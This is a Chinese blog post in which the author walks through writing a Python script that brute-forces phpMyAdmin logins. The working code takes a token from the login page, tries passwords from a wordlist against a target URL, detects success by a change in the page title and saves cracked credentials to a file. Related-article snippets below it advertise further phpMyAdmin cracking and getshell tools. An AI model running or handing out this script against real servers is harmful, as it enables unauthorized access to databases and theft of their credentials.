爆破phpmyadmin

最新推荐文章于 2023-05-23 17:30:18 发布
最新推荐文章于 2023-05-23 17:30:18 发布
阅读量1.1k 收藏 2
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51589948/article/details/119508366
版权

爆破phpmyadmin

  • 因为是第一次写脚本,所以没有爆破phpmyadmin的思路
  • 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路
  • 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e
  • 思路逐渐开始清晰,通过定义url user passdic(密码字典) headers session token
  • 重复获取token以及获取的title的信息
  • 构造payload发送请求
  • 对登录前后title的信息进行比对re.findall
import html
import re
import requests


url = 'http://url/index.php'

user = 'root'

passdic = '字典路径'

s = requests.session()
s.headers = {'Accept': '*/*',
             'Accept-Encoding': 'gzip, deflate',
             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
    token = re.findall("name=\"token\" value=\"(.*?)\" />", text)
    return html.unescape(token[0]) if token else None
def get_title(text) -> str:
    title = re.findall('<title>(.*)</title>', text)
    return title[0] if title else None
def try_login(user, pwd, token):
    data = {'pma_username': user,
            'pma_password': pwd,
            'server': 1,
            'target': 'index.php',
            'token': token
            }
    r = s.post(url, data=data)
    return r.text
def fuck_pma():
    with open(passdic, 'r', encoding='utf-8') as f:
        html = try_login('', '', '')
        title_fail = get_title(html)
        token = get_token(html)
        for line in f:
            pwd = line.strip()
            print(f'[?] 尝试登陆  {user}  {pwd}  ')
            html = try_login(user, pwd, token)
            title = get_title(html)
            token = get_token(html)
            if title != title_fail:
                print(f'[√] 登陆成功  {title}')
                with open('success.txt', 'a', encoding='utf-8') as f:
                    f.write(f'{url}  |  {user}  |  {pwd}\n')
                break
            else:
                print(f'[×] 登陆失败  {title}')
if __name__ == "__main__":
    try:
        fuck_pma()
    except Exception as e:
        print(e)
混混的小胖子233
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你的Root账号安全吗?-看我用phpmyadmin密码暴力破解工具攻破你的系统
weixin_44023460的博客
12-08 2075
你的Root账号安全吗?-看我用phpmyadmin密码暴力破解工具攻破你的系统 simeon phpmyadmin密码暴力破解是指通过指定账号和密码对mysql数据库进行登录尝试,如果字典中的密码跟实际密码匹配,则意味着密码破解成功。破解的前提是可以通过url正常登录phpmyadmin。通过phpmyadmin登录暴力破解 mysql root密码的条件有: (1)url能够正常访问。 (2)...
phpmyadmin getshell总结
good good study
10-25 3050
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpmyadmin爆破脚本练习
u014794539的博客
08-08 1680
初学python不久 记录一下写脚本的过程 思路 过程 首先 是要对于phpadmin的账号密码进行爆破 先找个环境抓个包看看 了解到需要脚本中 准备 请求头 还需要获取到token 最好还能获取到标题 以作验证 提交的数据中 需要pma_username pma_password server=1 target=index.php token等数据 还要进行会话保持 http协议本身是无状态的,为了让请求之间保持状态,有了session和cookie机制。requests也提供了相
phpmyadmin Getshell 思路
最新发布
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 238
phpmyadmin Getshell 思路
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
PHP字典全自动猜解MYSQL弱口令
09-10
PHP字典跑服务器MYSQL数据库密码,自己准备好字典(password.txt)和shell放在同一目录,访问shell.php即可。
phpMyAdmin爆破源码
05-21
phpMyAdmin爆破源码,找到phpMyAdmin登陆页面,可以使用该工具进行爆破
phpmyadmin批量爆破
01-23
phpmyadmin批量爆破】是一种针对PHPMyAdmin的网络安全测试方法,主要用于发现并测试该管理工具的弱口令情况。PHPMyAdmin是一款非常流行的基于Web的MySQL数据库管理工具,由于其广泛使用,成为了黑客攻击的目标之一...
phpmyadmin爆破程序
05-22
phpmyadmin爆破程序】 在网络安全领域,phpMyAdmin是一个非常常见的管理MySQL数据库的工具,因其便捷的Web界面而广受欢迎。然而,由于它的广泛使用,它也成为了黑客的目标,他们试图通过“爆破”(Brute Force ...
phpmyadmin爆破工具
03-28
phpMyAdmin(MySQL)暴力破解工具v1.3,纯净版。
phpMyAdmin多线程批量破解工具
10-16
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的工具,然后自己动手写了一款,多线程批量破解phpMyAdmin的工具,支持破解phpMyAdmin 2.11.10到4.4.11版本,如果需要支持变量用户名及密码(如%user%%domain%) 请私人定制。你还在为MySQL的外连功能关闭而烦恼吗,利用phpMyAdmin破解数据库账户密码的工具来了。
Python写的PHPMyAdmin暴力破解工具代码
12-25
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) hea
phpMyAdmin暴力破解v1.3
07-21
我正在网上搜刮了一下没发明相干的东西, 因而本身出手翰单真现这听命, 而今phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此东西仅供网友技术进修交换利用,请勿利用于犯警用处。 MySQL数据库字典,人人就本身网上支散了! 当前版本 v1.2 MD5:541465699949f3d60fcea923ccf245b2 sha1:e23d7ce46606d530abc4a9e473bdb0b5247aaff1 – ver1.2 措置对phpMyAdmin3.2.5版本暴破有标题问题,删加了一个工作线程, 美化了界面。 – ver1.1 1.0版本有个标题问题,正在win7、vista下都不能正常扫描, 现曾纠正过往。 ————————————————— 技术总结: 《vc6建正删除cookie真现》 InternetSetCookie函数太老,能建正一般cookie值,但是正在win7下高版本Wininet.DLL中无法让HTTPONLY类型的cookie过时, 要利用InternetSetCookieEx函数才成功,正在vs2010下直接用该函数,vc6下本身加载模块查找函数, vc6下查找利用该函数删除cookie以下: HINSTANCE hInst = LoadLibrary(“Wininet.DLL”); if(hInst) { typedef BOOL (WINAPI *pfnInternetSetCookieEx)(LPCSTR, LPCSTR, LPCSTR, DWORD, DWORD); pfnInternetSetCookieEx InternetSetCookieEx = NULL; InternetSetCookieEx = (pfnInternetSetCookieEx)GetProcAddress(hInst, “InternetSetCookieExA”); //InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); FreeLibrary(hInst); } 寄看,要分隔设置cookie字段,不能一次设置多个字段,不然不成功,下面的语句只要第一个字段被设置成功,其它字段均不成功! InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; pma_mcrypt_iv=; pmaUser-1=; pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 精确理当如许写, InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pma_mcrypt_iv=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaUser-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 1>
phpmyadmin及php爆路径字典
11-04
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
phpmyadmin爆破绝对路径
偷一个月亮
04-16 3955
phpmyadmin爆绝对路径 phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpMyAdmin/themes/darkblue_orange/layout.inc.php 转载链接:https://www.jian...
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpMyadmin提权那些事
dfdhxb995397的博客
06-01 346
i春秋作家:anyedt phpMyadmin提权那些事 引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。 0×00 定义 ​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 ...
PHPmyadmin Getshell
Grey的博客
07-21 6877
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
字典生成----在线密码破解工具hydra和medusa的使用
王先生的蒋小姐的博客
06-11 1万+
大家好,我是SuieKa。 本次主要稍微详细分析一下字典的生成和在线密码破解工具hydra和medusa及使用案例,希望对大家学习上有帮助! 目录表一、字典生成工具及使用方法二、密码破解工具==hydra==的使用三、密码破解工具==medusa==的使用 一、字典生成工具及使用方法 二、密码破解工具hydra的使用 三、密码破解工具medusa的使用 ...
phpMyAdmin配置文件config 详解.doc
11-29
phpMyAdmin配置文件config 详解.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值